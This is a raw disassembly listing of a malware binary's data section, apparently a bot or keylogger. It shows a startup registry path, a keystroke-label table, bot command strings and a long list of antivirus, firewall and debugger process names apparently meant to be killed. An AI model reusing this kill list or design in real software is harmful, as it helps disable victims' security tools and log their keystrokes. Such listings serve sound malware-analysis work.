dword_42E4F0 dd 80000002h off_42E4F4 dd offset aSoftwareMicr_0 ; DATA XREF: sub_40214F+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 42FEC4h, 80000001h, 42FEFCh
dword_42E508 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42E554 dd 3000005h, 10h, 18h, 1, 3 dup(0); ---------------------------------------------------------------------------
loc_42E570: ; DATA XREF: sub_40402D+10F�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42E584 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_40402D+138�o
dd 8
dword_42E59C dd 62h, 62000000h, 2 dup(0) dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_42ECCC dd 38h, 38000000h, 2 dup(0) dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 3 dup(0)
off_42ED08 dd offset aAdd ; DATA XREF: sub_4082EB+59�r
; sub_408363+4A�r ...
; "Add"
off_42ED0C dd offset aAdded ; DATA XREF: sub_4082EB+2D�r
; sub_408363+7C�r ...
; "Added"
dword_42ED10 dd 0 dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 4246C8h, 4246C0h, 2, 4246B4h, 4246A8h, 3, 0
dword_42ED60 dd 7530h align 8
off_42ED68 dd offset aAckwin32_exe ; DATA XREF: sub_408D49:loc_408E10�r
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe_0 ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
